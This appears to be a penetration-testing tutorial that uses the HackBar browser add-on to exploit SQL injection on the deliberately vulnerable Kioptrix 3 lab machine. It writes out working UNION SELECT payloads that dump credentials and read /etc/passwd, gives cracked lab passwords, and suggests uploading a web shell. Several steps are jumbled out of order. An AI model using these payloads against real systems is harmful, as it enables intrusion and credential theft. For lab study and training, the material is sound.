The Iceweasel browser provides penetration testers with a myriad of tools that make web application testing efficient and fun. It takes advantage of many of the browser-based plugins that have been written over the years. We will use the plugin HackBar within Iceweasel to fully exploit the Kioptrix 3 machine in our lab in an efficient manner. The primary plugin we take advantage of in this example is the HackBar. You can learn more about HackBar at https://addons.mozilla.org/en-US/firefox/addon/hackbar/. The HackBar and other add-ons that can be added to Iceweasel make testing web applications fun and allow a knowledgeable penetration tester to manually verify the security of a web application.
Open the Iceweasel browser and click on Open menu | Add-ons, located on the right-hand side of the screen next to the home icon. In the Search all add-ons field, enter HackBar
and search for the tool; once it is found, install it and restart the browser:
http://kioptrix3.com/gallery/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6+from+gallarific_users--
admin
and the password n0t7t1k4
.http://kioptrix3.com/gallery/gallery.php?id=1
and click on Execute.http://kioptrix3.com/gallery/gallery.php?id=1
entry in the HackBar, add a space, and then directly above the HackBar click SQL | Union Select Statement and enter 6
in the pop up that appears. Then, click on OK. Click on the HackBar Execute button to verify that the SQL injection works.2
in the query that was generated, by highlighting it and clicking on SQL | MySQL | Basic Info Column, so that your URL now looks like this: http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),@@version),3,4,5,6
. Click on Execute on the HackBar and review the results. The output should contain the following information: root@localhost:gallery:5.0.51a-3ubuntu5.4
. You have successfully enumerated the user, database name, and version that are running.http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,table_name,3,4,5,6frominformation_schema.tableswheretable_schema=database()
, which will list all of the tables from the current database.http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6
. This will list the password file from the server.http://kioptrix3.com/gallery/gallery.php?id=1 UNION SELECT 1,username,password,4,5,6 from dev_accounts,
which provides us with the information for the username loneferret
, with a password hash value of 5badcaf789d3d1d09794d8f021f40f0e
, and the user dreg
, with a password hash of 0d3eccfb887aabd50f243b3f155c0f85
. We can try to crack these user passwords. Successfully cracking the passwords will provide you with the following credentials: dreg
- Mast3r
and loneferret
- starwars
.These users have fallen into the pitfall of reusing passwords. You can log onto the Kioptrix 1.2 machine on your lab now by opening up an SSH session from your Kali to the Kioptrix machine. Luckily, these accounts are not in the sudoers list. Now, we need to elevate the privilege of one of the accounts.
At this point, you are almost at root on the Kioptrix Level 1.2 machine. Take your time, look around the server and try to figure out a method of escalating the privilege of either user.
Once you have gained root using SSH, challenge yourself again by uploading a shell to the Kioptrix Level 1.2 machine using nothing but the website! There are several different methods of accomplishing this; if you get stuck, take a look at one of the many walkthroughs on the Web.